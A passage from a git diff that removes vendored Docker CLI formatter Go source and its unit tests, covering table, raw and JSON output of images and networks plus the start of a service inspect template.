(%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) - } - - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go b/vendor/github.com/docker/docker/cli/command/formatter/formatter.go deleted file mode 100644 index e859a1ca26..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/formatter.go +++ /dev/null @@ -1,123 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - "io" - "strings" - "text/tabwriter" - "text/template" - - "github.com/docker/docker/utils/templates" -) - -// Format keys used to specify certain kinds of output formats -const ( - TableFormatKey = "table" - RawFormatKey = "raw" - PrettyFormatKey = "pretty" - - defaultQuietFormat = "{{.ID}}" -) - -// Format is the format string rendered using the Context -type Format string - -// IsTable returns true if the format is a table-type format -func (f Format) IsTable() bool { - return strings.HasPrefix(string(f), TableFormatKey) -} - -// Contains returns true if the format contains the substring -func (f Format) Contains(sub string) bool { - return strings.Contains(string(f), sub) -} - -// Context contains information required by the formatter to print the output as desired. -type Context struct { - // Output is the output stream to which the formatted string is written. - Output io.Writer - // Format is used to choose raw, table or custom format for the output. - Format Format - // Trunc when set to true will truncate the output of certain fields such as Container ID. - Trunc bool - - // internal element - finalFormat string - header string - buffer *bytes.Buffer -} - -func (c *Context) preFormat() { - c.finalFormat = string(c.Format) - - // TODO: handle this in the Format type - if c.Format.IsTable() { - c.finalFormat = c.finalFormat[len(TableFormatKey):] - } - - c.finalFormat = strings.Trim(c.finalFormat, " ") - r := strings.NewReplacer(`\t`, "\t", `\n`, "\n") - c.finalFormat = r.Replace(c.finalFormat) -} - -func (c *Context) parseFormat() (*template.Template, error) { - tmpl, err := templates.Parse(c.finalFormat) - if err != nil { - return tmpl, fmt.Errorf("Template parsing error: %v\n", err) - } - return tmpl, err -} - -func (c *Context) postFormat(tmpl *template.Template, subContext subContext) { - if c.Format.IsTable() { - if len(c.header) == 0 { - // if we still don't have a header, we didn't have any containers so we need to fake it to get the right headers from the template - tmpl.Execute(bytes.NewBufferString(""), subContext) - c.header = subContext.FullHeader() - } - - t := tabwriter.NewWriter(c.Output, 20, 1, 3, ' ', 0) - t.Write([]byte(c.header)) - t.Write([]byte("\n")) - c.buffer.WriteTo(t) - t.Flush() - } else { - c.buffer.WriteTo(c.Output) - } -} - -func (c *Context) contextFormat(tmpl *template.Template, subContext subContext) error { - if err := tmpl.Execute(c.buffer, subContext); err != nil { - return fmt.Errorf("Template parsing error: %v\n", err) - } - if c.Format.IsTable() && len(c.header) == 0 { - c.header = subContext.FullHeader() - } - c.buffer.WriteString("\n") - return nil -} - -// SubFormat is a function type accepted by Write() -type SubFormat func(func(subContext) error) error - -// Write the template to the buffer using this Context -func (c *Context) Write(sub subContext, f SubFormat) error { - c.buffer = bytes.NewBufferString("") - c.preFormat() - - tmpl, err := c.parseFormat() - if err != nil { - return err - } - - subFormat := func(subContext subContext) error { - return c.contextFormat(tmpl, subContext) - } - if err := f(subFormat); err != nil { - return err - } - - c.postFormat(tmpl, sub) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image.go b/vendor/github.com/docker/docker/cli/command/formatter/image.go deleted file mode 100644 index 5c7de826f0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/image.go +++ /dev/null @@ -1,259 +0,0 @@ -package formatter - -import ( - "fmt" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" - units "github.com/docker/go-units" -) - -const ( - defaultImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" - defaultImageTableFormatWithDigest = "table {{.Repository}}\t{{.Tag}}\t{{.Digest}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.Size}}" - - imageIDHeader = "IMAGE ID" - repositoryHeader = "REPOSITORY" - tagHeader = "TAG" - digestHeader = "DIGEST" -) - -// ImageContext contains image specific information required by the formater, encapsulate a Context struct. -type ImageContext struct { - Context - Digest bool -} - -func isDangling(image types.ImageSummary) bool { - return len(image.RepoTags) == 1 && image.RepoTags[0] == ":" && len(image.RepoDigests) == 1 && image.RepoDigests[0] == "@" -} - -// NewImageFormat returns a format for rendering an ImageContext -func NewImageFormat(source string, quiet bool, digest bool) Format { - switch source { - case TableFormatKey: - switch { - case quiet: - return defaultQuietFormat - case digest: - return defaultImageTableFormatWithDigest - default: - return defaultImageTableFormat - } - case RawFormatKey: - switch { - case quiet: - return `image_id: {{.ID}}` - case digest: - return `repository: {{ .Repository }} -tag: {{.Tag}} -digest: {{.Digest}} -image_id: {{.ID}} -created_at: {{.CreatedAt}} -virtual_size: {{.Size}} -` - default: - return `repository: {{ .Repository }} -tag: {{.Tag}} -image_id: {{.ID}} -created_at: {{.CreatedAt}} -virtual_size: {{.Size}} -` - } - } - - format := Format(source) - if format.IsTable() && digest && !format.Contains("{{.Digest}}") { - format += "\t{{.Digest}}" - } - return format -} - -// ImageWrite writes the formatter images using the ImageContext -func ImageWrite(ctx ImageContext, images []types.ImageSummary) error { - render := func(format func(subContext subContext) error) error { - return imageFormat(ctx, images, format) - } - return ctx.Write(&imageContext{}, render) -} - -func imageFormat(ctx ImageContext, images []types.ImageSummary, format func(subContext subContext) error) error { - for _, image := range images { - images := []*imageContext{} - if isDangling(image) { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: "", - tag: "", - digest: "", - }) - } else { - repoTags := map[string][]string{} - repoDigests := map[string][]string{} - - for _, refString := range append(image.RepoTags) { - ref, err := reference.ParseNamed(refString) - if err != nil { - continue - } - if nt, ok := ref.(reference.NamedTagged); ok { - repoTags[ref.Name()] = append(repoTags[ref.Name()], nt.Tag()) - } - } - for _, refString := range append(image.RepoDigests) { - ref, err := reference.ParseNamed(refString) - if err != nil { - continue - } - if c, ok := ref.(reference.Canonical); ok { - repoDigests[ref.Name()] = append(repoDigests[ref.Name()], c.Digest().String()) - } - } - - for repo, tags := range repoTags { - digests := repoDigests[repo] - - // Do not display digests as their own row - delete(repoDigests, repo) - - if !ctx.Digest { - // Ignore digest references, just show tag once - digests = nil - } - - for _, tag := range tags { - if len(digests) == 0 { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: tag, - digest: "", - }) - continue - } - // Display the digests for each tag - for _, dgst := range digests { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: tag, - digest: dgst, - }) - } - - } - } - - // Show rows for remaining digest only references - for repo, digests := range repoDigests { - // If digests are displayed, show row per digest - if ctx.Digest { - for _, dgst := range digests { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: "", - digest: dgst, - }) - } - } else { - images = append(images, &imageContext{ - trunc: ctx.Trunc, - i: image, - repo: repo, - tag: "", - }) - } - } - } - for _, imageCtx := range images { - if err := format(imageCtx); err != nil { - return err - } - } - } - return nil -} - -type imageContext struct { - HeaderContext - trunc bool - i types.ImageSummary - repo string - tag string - digest string -} - -func (c *imageContext) ID() string { - c.AddHeader(imageIDHeader) - if c.trunc { - return stringid.TruncateID(c.i.ID) - } - return c.i.ID -} - -func (c *imageContext) Repository() string { - c.AddHeader(repositoryHeader) - return c.repo -} - -func (c *imageContext) Tag() string { - c.AddHeader(tagHeader) - return c.tag -} - -func (c *imageContext) Digest() string { - c.AddHeader(digestHeader) - return c.digest -} - -func (c *imageContext) CreatedSince() string { - c.AddHeader(createdSinceHeader) - createdAt := time.Unix(int64(c.i.Created), 0) - return units.HumanDuration(time.Now().UTC().Sub(createdAt)) -} - -func (c *imageContext) CreatedAt() string { - c.AddHeader(createdAtHeader) - return time.Unix(int64(c.i.Created), 0).String() -} - -func (c *imageContext) Size() string { - c.AddHeader(sizeHeader) - return units.HumanSizeWithPrecision(float64(c.i.Size), 3) -} - -func (c *imageContext) Containers() string { - c.AddHeader(containersHeader) - if c.i.Containers == -1 { - return "N/A" - } - return fmt.Sprintf("%d", c.i.Containers) -} - -func (c *imageContext) VirtualSize() string { - c.AddHeader(sizeHeader) - return units.HumanSize(float64(c.i.VirtualSize)) -} - -func (c *imageContext) SharedSize() string { - c.AddHeader(sharedSizeHeader) - if c.i.SharedSize == -1 { - return "N/A" - } - return units.HumanSize(float64(c.i.SharedSize)) -} - -func (c *imageContext) UniqueSize() string { - c.AddHeader(uniqueSizeHeader) - if c.i.VirtualSize == -1 || c.i.SharedSize == -1 { - return "N/A" - } - return units.HumanSize(float64(c.i.VirtualSize - c.i.SharedSize)) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go b/vendor/github.com/docker/docker/cli/command/formatter/image_test.go deleted file mode 100644 index ffe77f6677..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/image_test.go +++ /dev/null @@ -1,333 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestImageContext(t *testing.T) { - imageID := stringid.GenerateRandomID() - unix := time.Now().Unix() - - var ctx imageContext - cases := []struct { - imageCtx imageContext - expValue string - expHeader string - call func() string - }{ - {imageContext{ - i: types.ImageSummary{ID: imageID}, - trunc: true, - }, stringid.TruncateID(imageID), imageIDHeader, ctx.ID}, - {imageContext{ - i: types.ImageSummary{ID: imageID}, - trunc: false, - }, imageID, imageIDHeader, ctx.ID}, - {imageContext{ - i: types.ImageSummary{Size: 10, VirtualSize: 10}, - trunc: true, - }, "10 B", sizeHeader, ctx.Size}, - {imageContext{ - i: types.ImageSummary{Created: unix}, - trunc: true, - }, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, - // FIXME - // {imageContext{ - // i: types.ImageSummary{Created: unix}, - // trunc: true, - // }, units.HumanDuration(time.Unix(unix, 0)), createdSinceHeader, ctx.CreatedSince}, - {imageContext{ - i: types.ImageSummary{}, - repo: "busybox", - }, "busybox", repositoryHeader, ctx.Repository}, - {imageContext{ - i: types.ImageSummary{}, - tag: "latest", - }, "latest", tagHeader, ctx.Tag}, - {imageContext{ - i: types.ImageSummary{}, - digest: "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", - }, "sha256:d149ab53f8718e987c3a3024bb8aa0e2caadf6c0328f1d9d850b2a2a67f2819a", digestHeader, ctx.Digest}, - } - - for _, c := range cases { - ctx = c.imageCtx - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestImageContextWrite(t *testing.T) { - unixTime := time.Now().AddDate(0, 0, -1).Unix() - expectedTime := time.Unix(unixTime, 0).String() - - cases := []struct { - context ImageContext - expected string - }{ - // Errors - { - ImageContext{ - Context: Context{ - Format: "{{InvalidFunction}}", - }, - }, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - ImageContext{ - Context: Context{ - Format: "{{nil}}", - }, - }, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", false, false), - }, - }, - `REPOSITORY TAG IMAGE ID CREATED SIZE -image tag1 imageID1 24 hours ago 0 B -image tag2 imageID2 24 hours ago 0 B - imageID3 24 hours ago 0 B -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, false), - }, - }, - "REPOSITORY\nimage\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, true), - }, - Digest: true, - }, - `REPOSITORY DIGEST -image sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf -image - -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", true, false), - }, - }, - "REPOSITORY\nimage\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", true, false), - }, - }, - "imageID1\nimageID2\nimageID3\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", false, true), - }, - Digest: true, - }, - `REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE -image tag1 sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf imageID1 24 hours ago 0 B -image tag2 imageID2 24 hours ago 0 B - imageID3 24 hours ago 0 B -`, - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table", true, true), - }, - Digest: true, - }, - "imageID1\nimageID2\nimageID3\n", - }, - // Raw Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("raw", false, false), - }, - }, - fmt.Sprintf(`repository: image -tag: tag1 -image_id: imageID1 -created_at: %s -virtual_size: 0 B - -repository: image -tag: tag2 -image_id: imageID2 -created_at: %s -virtual_size: 0 B - -repository: -tag: -image_id: imageID3 -created_at: %s -virtual_size: 0 B - -`, expectedTime, expectedTime, expectedTime), - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("raw", false, true), - }, - Digest: true, - }, - fmt.Sprintf(`repository: image -tag: tag1 -digest: sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf -image_id: imageID1 -created_at: %s -virtual_size: 0 B - -repository: image -tag: tag2 -digest: -image_id: imageID2 -created_at: %s -virtual_size: 0 B - -repository: -tag: -digest: -image_id: imageID3 -created_at: %s -virtual_size: 0 B - -`, expectedTime, expectedTime, expectedTime), - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("raw", true, false), - }, - }, - `image_id: imageID1 -image_id: imageID2 -image_id: imageID3 -`, - }, - // Custom Format - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, false), - }, - }, - "image\nimage\n\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, true), - }, - Digest: true, - }, - "image\nimage\n\n", - }, - } - - for _, testcase := range cases { - images := []types.ImageSummary{ - {ID: "imageID1", RepoTags: []string{"image:tag1"}, RepoDigests: []string{"image@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"}, Created: unixTime}, - {ID: "imageID2", RepoTags: []string{"image:tag2"}, Created: unixTime}, - {ID: "imageID3", RepoTags: []string{":"}, RepoDigests: []string{"@"}, Created: unixTime}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := ImageWrite(testcase.context, images) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestImageContextWriteWithNoImage(t *testing.T) { - out := bytes.NewBufferString("") - images := []types.ImageSummary{} - - contexts := []struct { - context ImageContext - expected string - }{ - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, false), - Output: out, - }, - }, - "", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, false), - Output: out, - }, - }, - "REPOSITORY\n", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("{{.Repository}}", false, true), - Output: out, - }, - }, - "", - }, - { - ImageContext{ - Context: Context{ - Format: NewImageFormat("table {{.Repository}}", false, true), - Output: out, - }, - }, - "REPOSITORY DIGEST\n", - }, - } - - for _, context := range contexts { - ImageWrite(context.context, images) - assert.Equal(t, out.String(), context.expected) - // Clean buffer - out.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network.go b/vendor/github.com/docker/docker/cli/command/formatter/network.go deleted file mode 100644 index 7fbad7d2ab..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/network.go +++ /dev/null @@ -1,117 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" -) - -const ( - defaultNetworkTableFormat = "table {{.ID}}\t{{.Name}}\t{{.Driver}}\t{{.Scope}}" - - networkIDHeader = "NETWORK ID" - ipv6Header = "IPV6" - internalHeader = "INTERNAL" -) - -// NewNetworkFormat returns a Format for rendering using a network Context -func NewNetworkFormat(source string, quiet bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultQuietFormat - } - return defaultNetworkTableFormat - case RawFormatKey: - if quiet { - return `network_id: {{.ID}}` - } - return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n` - } - return Format(source) -} - -// NetworkWrite writes the context -func NetworkWrite(ctx Context, networks []types.NetworkResource) error { - render := func(format func(subContext subContext) error) error { - for _, network := range networks { - networkCtx := &networkContext{trunc: ctx.Trunc, n: network} - if err := format(networkCtx); err != nil { - return err - } - } - return nil - } - return ctx.Write(&networkContext{}, render) -} - -type networkContext struct { - HeaderContext - trunc bool - n types.NetworkResource -} - -func (c *networkContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *networkContext) ID() string { - c.AddHeader(networkIDHeader) - if c.trunc { - return stringid.TruncateID(c.n.ID) - } - return c.n.ID -} - -func (c *networkContext) Name() string { - c.AddHeader(nameHeader) - return c.n.Name -} - -func (c *networkContext) Driver() string { - c.AddHeader(driverHeader) - return c.n.Driver -} - -func (c *networkContext) Scope() string { - c.AddHeader(scopeHeader) - return c.n.Scope -} - -func (c *networkContext) IPv6() string { - c.AddHeader(ipv6Header) - return fmt.Sprintf("%v", c.n.EnableIPv6) -} - -func (c *networkContext) Internal() string { - c.AddHeader(internalHeader) - return fmt.Sprintf("%v", c.n.Internal) -} - -func (c *networkContext) Labels() string { - c.AddHeader(labelsHeader) - if c.n.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.n.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *networkContext) Label(name string) string { - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", "_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.n.Labels == nil { - return "" - } - return c.n.Labels[name] -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go deleted file mode 100644 index b40a534eed..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go +++ /dev/null @@ -1,208 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestNetworkContext(t *testing.T) { - networkID := stringid.GenerateRandomID() - - var ctx networkContext - cases := []struct { - networkCtx networkContext - expValue string - expHeader string - call func() string - }{ - {networkContext{ - n: types.NetworkResource{ID: networkID}, - trunc: false, - }, networkID, networkIDHeader, ctx.ID}, - {networkContext{ - n: types.NetworkResource{ID: networkID}, - trunc: true, - }, stringid.TruncateID(networkID), networkIDHeader, ctx.ID}, - {networkContext{ - n: types.NetworkResource{Name: "network_name"}, - }, "network_name", nameHeader, ctx.Name}, - {networkContext{ - n: types.NetworkResource{Driver: "driver_name"}, - }, "driver_name", driverHeader, ctx.Driver}, - {networkContext{ - n: types.NetworkResource{EnableIPv6: true}, - }, "true", ipv6Header, ctx.IPv6}, - {networkContext{ - n: types.NetworkResource{EnableIPv6: false}, - }, "false", ipv6Header, ctx.IPv6}, - {networkContext{ - n: types.NetworkResource{Internal: true}, - }, "true", internalHeader, ctx.Internal}, - {networkContext{ - n: types.NetworkResource{Internal: false}, - }, "false", internalHeader, ctx.Internal}, - {networkContext{ - n: types.NetworkResource{}, - }, "", labelsHeader, ctx.Labels}, - {networkContext{ - n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, - }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, - } - - for _, c := range cases { - ctx = c.networkCtx - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestNetworkContextWrite(t *testing.T) { - cases := []struct { - context Context - expected string - }{ - - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table format - { - Context{Format: NewNetworkFormat("table", false)}, - `NETWORK ID NAME DRIVER SCOPE -networkID1 foobar_baz foo local -networkID2 foobar_bar bar local -`, - }, - { - Context{Format: NewNetworkFormat("table", true)}, - `networkID1 -networkID2 -`, - }, - { - Context{Format: NewNetworkFormat("table {{.Name}}", false)}, - `NAME -foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewNetworkFormat("table {{.Name}}", true)}, - `NAME -foobar_baz -foobar_bar -`, - }, - // Raw Format - { - Context{Format: NewNetworkFormat("raw", false)}, - `network_id: networkID1 -name: foobar_baz -driver: foo -scope: local - -network_id: networkID2 -name: foobar_bar -driver: bar -scope: local - -`, - }, - { - Context{Format: NewNetworkFormat("raw", true)}, - `network_id: networkID1 -network_id: networkID2 -`, - }, - // Custom Format - { - Context{Format: NewNetworkFormat("{{.Name}}", false)}, - `foobar_baz -foobar_bar -`, - }, - } - - for _, testcase := range cases { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"}, - {ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := NetworkWrite(testcase.context, networks) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestNetworkContextWriteJSON(t *testing.T) { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz"}, - {ID: "networkID2", Name: "foobar_bar"}, - } - expectedJSONs := []map[string]interface{}{ - {"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""}, - {"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", "Scope": ""}, - } - - out := bytes.NewBufferString("") - err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestNetworkContextWriteJSONField(t *testing.T) { - networks := []types.NetworkResource{ - {ID: "networkID1", Name: "foobar_baz"}, - {ID: "networkID2", Name: "foobar_bar"}, - } - out := bytes.NewBufferString("") - err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, networks[i].ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go deleted file mode 100644 index d1d8737d21..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go +++ /dev/null @@ -1,65 +0,0 @@ -package formatter - -import ( - "encoding/json" - "fmt" - "reflect" - "unicode" -) - -func marshalJSON(x interface{}) ([]byte, error) { - m, err := marshalMap(x) - if err != nil { - return nil, err - } - return json.Marshal(m) -} - -// marshalMap marshals x to map[string]interface{} -func marshalMap(x interface{}) (map[string]interface{}, error) { - val := reflect.ValueOf(x) - if val.Kind() != reflect.Ptr { - return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind()) - } - if val.IsNil() { - return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer") - } - valElem := val.Elem() - if valElem.Kind() != reflect.Struct { - return nil, fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind()) - } - typ := val.Type() - m := make(map[string]interface{}) - for i := 0; i < val.NumMethod(); i++ { - k, v, err := marshalForMethod(typ.Method(i), val.Method(i)) - if err != nil { - return nil, err - } - if k != "" { - m[k] = v - } - } - return m, nil -} - -var unmarshallableNames = map[string]struct{}{"FullHeader": {}} - -// marshalForMethod returns the map key and the map value for marshalling the method. -// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()") -func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) { - if val.Kind() != reflect.Func { - return "", nil, fmt.Errorf("expected func, got %v", val.Kind()) - } - name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut() - _, blackListed := unmarshallableNames[name] - // FIXME: In text/template, (numOut == 2) is marshallable, - // if the type of the second param is error. - marshallable := unicode.IsUpper(rune(name[0])) && !blackListed && - numIn == 0 && numOut == 1 - if !marshallable { - return "", nil, nil - } - result := val.Call(make([]reflect.Value, numIn)) - intf := result[0].Interface() - return name, intf, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go deleted file mode 100644 index e547b18411..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go +++ /dev/null @@ -1,66 +0,0 @@ -package formatter - -import ( - "reflect" - "testing" -) - -type dummy struct { -} - -func (d *dummy) Func1() string { - return "Func1" -} - -func (d *dummy) func2() string { - return "func2(should not be marshalled)" -} - -func (d *dummy) Func3() (string, int) { - return "Func3(should not be marshalled)", -42 -} - -func (d *dummy) Func4() int { - return 4 -} - -type dummyType string - -func (d *dummy) Func5() dummyType { - return dummyType("Func5") -} - -func (d *dummy) FullHeader() string { - return "FullHeader(should not be marshalled)" -} - -var dummyExpected = map[string]interface{}{ - "Func1": "Func1", - "Func4": 4, - "Func5": dummyType("Func5"), -} - -func TestMarshalMap(t *testing.T) { - d := dummy{} - m, err := marshalMap(&d) - if err != nil { - t.Fatal(err) - } - if !reflect.DeepEqual(dummyExpected, m) { - t.Fatalf("expected %+v, got %+v", - dummyExpected, m) - } -} - -func TestMarshalMapBad(t *testing.T) { - if _, err := marshalMap(nil); err == nil { - t.Fatal("expected an error (argument is nil)") - } - if _, err := marshalMap(dummy{}); err == nil { - t.Fatal("expected an error (argument is non-pointer)") - } - x := 42 - if _, err := marshalMap(&x); err == nil { - t.Fatal("expected an error (argument is a pointer to non-struct)") - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go deleted file mode 100644 index aaa78386cb..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/service.go +++ /dev/null @@ -1,322 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - "time" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command/inspect" - units "github.com/docker/go-units" -) - -const serviceInspectPrettyTemplate Format = ` -ID: {{.ID}} -Name: {{.Name}} -{{- if .Labels }} -Labels: -{{- range $k, $v := .Labels }} - {{ $k }}{{if $v }}={{ $v }}{{ end }} -{{- end }}{{ end }} -Service Mode: -{{- if .IsModeGlobal }} Global -{{- else if .IsModeReplicated }} Replicated -{{- if .ModeReplicatedReplicas }} - Replicas: {{ .ModeReplicatedReplicas }} -{{- end }}{{ end }} -{{- if .HasUpdateStatus }} -UpdateStatus: - State: {{ .UpdateStatusState }} - Started: {{ .UpdateStatusStarted }} -{{- if .UpdateIsCompleted }} - Completed: {{ .UpdateStatusCompleted }} -{{- end }} - Message: {{ .UpdateStatusMessage }} -{{- end }} -Placement: -{{- if .TaskPlacementConstraints -}} - Contraints: {{ .TaskPlacementConstraints }} -{{- end }} -{{- if .HasUpdateConfig }} -UpdateConfig: - Parallelism: {{ .UpdateParallelism }} -{{- if .HasUpdateDelay}} - Delay: {{ .UpdateDelay }} -{{- end }} - On failure: {{ .UpdateOnFailure }} -{{- if .HasUpdateMonitor}} - Monitoring Period: {{ .UpdateMonitor }} -{{- end }} - Max failure ratio: {{ .UpdateMaxFailureRatio }} -{{- end }} -ContainerSpec: - Image: {{ .ContainerImage }} -{{- if .ContainerArgs }} - Args: {{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }} -{{- end -}} -{{- if .ContainerEnv }} - Env: {{ range $env := .ContainerEnv }}{{ $env }} {{ end }} -{{- end -}} -{{- if .ContainerWorkDir }} - Dir: {{ .ContainerWorkDir }} -{{- end -}} -{{- if .ContainerUser }} - User: {{ .ContainerUser }} -{{- end }} -{{- if .ContainerMounts }} -Mounts: -{{- end }} -{{- range $mount := .ContainerMounts }} - Target = {{ $mount.Target }} - Source = {{ $mount.Source }} - ReadOnly = {{ $mount.ReadOnly }} - Type = {{ $mount.Type }} -{{- end -}} -{{- if .HasResources }} -Resources: -{{- if .HasResourceReservations }} - Reservations: -{{- if gt .ResourceReservationNanoCPUs 0.0 }} - CPU: {{ .ResourceReservationNanoCPUs }} -{{- end }} -{{- if .ResourceReservationMemory }} - Memory: {{ .ResourceReservationMemory }} -{{- end }}{{ end }} -{{- if .HasResourceLimits }} - Limits: -{{- if gt .ResourceLimitsNanoCPUs 0.0 }} - CPU: {{ .ResourceLimitsNanoCPUs }} -{{- end }} -{{- if .ResourceLimitMemory }} - Memory: {{ 